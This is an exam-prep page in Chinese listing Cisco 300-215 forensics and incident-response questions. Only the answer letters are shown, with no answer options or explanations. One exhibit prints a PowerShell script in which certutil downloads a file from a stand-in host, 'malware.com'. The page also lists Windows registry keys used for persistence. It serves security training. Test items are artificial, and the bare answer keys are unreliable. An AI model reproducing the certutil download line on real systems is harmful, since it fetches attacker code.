最新的Cisco Conducting Forensic Analysis & Incident Response Using Cisco Technologies for CyberOps - 300-215免費考試真題


Refer to the exhibit. A network administrator creates an Apache log parser by using Python. What needs to be added in the box where the code is missing to accomplish the requirement?

正確答案: A
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.

An internally deployed SIEM flags two login events associated with the same employee. Which type of IOC makes this activity require investigation?

正確答案: B
說明:(僅 Fast2test 成員可見)
A threat actor attempts to avoid detection by turning data into a code that shifts numbers to the right four times. Which anti-forensics technique is being used?

正確答案: B
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.

Which registry key is suspected of being used by an attacker to establish persistence?

正確答案: B
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.

What do these artifacts indicate?

正確答案: C
說明:(僅 Fast2test 成員可見)
A company's security engineer notices through the SIEM that an employee's workstation sent several DNS requests involving the external IP address of the suspicious domain a4sn77d8z3dsci9416cov.com. After investigating multiple log sources, the security team determines that the employee downloaded an infected PDF file through a URL in an email. Which two elements must be included in the root cause analysis report?
(Choose two.)

正確答案: A,C
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.
Registry Key Activity
MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN modified (1)
MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE created (1),
modified (2)
MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON modified (1) MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\ENVIRONMENT modified (1) MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER modified (2) MACHINE\SOFTWARE\MICROSOFT\COMMAND PROCESSOR modified (1) For user S-5-21-0533532869, which registry key shows evidence of persistence through a newly created autorun entry?

正確答案: C
說明:(僅 Fast2test 成員可見)
A threat actor has successfully attacked an organization and gained access to confidential files on a laptop.
What plan should the organization initiate to contain the attack and prevent it from spreading to other network devices?

正確答案: C
說明:(僅 Fast2test 成員可見)
What is the steganography anti-forensics technique?

正確答案: D
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.
$datePath = " certutil-$(Get-Date -format yyyy_MM_dd) "
New-Item -Path $datePath -ItemType Directory
Set-Location $datePath
certutil -verifyctl -split -f https://malware.com/XY874HZ.txt
Get-ChildItem | Where-Object {$_.Name -notlike " *.txt " } | ForEach-Object { Move-Item $_.Name -Destination XY874HZ.txt
}
During a threat-intelligence review, a cybersecurity analyst evaluates artifacts from a recent incident involving a compromised server. The artifacts include a script that uses certutil to download files from a suspicious URL. This finding is critical for determining the threat-actor profile responsible for the attack.
Which threat-actor profile aligns with the artifacts?

正確答案: B
說明:(僅 Fast2test 成員可見)
A cybersecurity analyst must evaluate files from an endpoint in an enterprise network. The antivirus software on the endpoint flagged a suspicious file during a routine scan On initial evaluation the file did not match any known signatures in the antivirus database, but exhibited unusual network behavior during dynamic analysis Which step should the analyst take next?

正確答案: B
A security team receives reports of multiple files causing suspicious activity on users' workstations. The file attempted to access highly confidential information in a centralized file server. Which two actions should be taken by a security analyst to evaluate the file in a sandbox? (Choose two.)

正確答案: B,E
說明:(僅 Fast2test 成員可見)
Refer to the exhibit.

A security analyst reviews Splunk results for a public web server. What does the log activity indicate?

正確答案: B
說明:(僅 Fast2test 成員可見)
An attacker embedded a macro within a word processing file opened by a user in an organization's legal department. The attacker used this technique to gain access to confidential financial data. Which two recommendations should a security expert make to mitigate this type of attack? (Choose two.)

正確答案: C,D
說明:(僅 Fast2test 成員可見)

聯系我們

如果您有任何問題,請留下您的電子郵件地址,我們將在12小時內回复電子郵件給您。

我們的工作時間:( GMT 0:00-15:00 )
週一至週六

技術支持: 立即聯繫 

English 日本語 Deutsch 한국어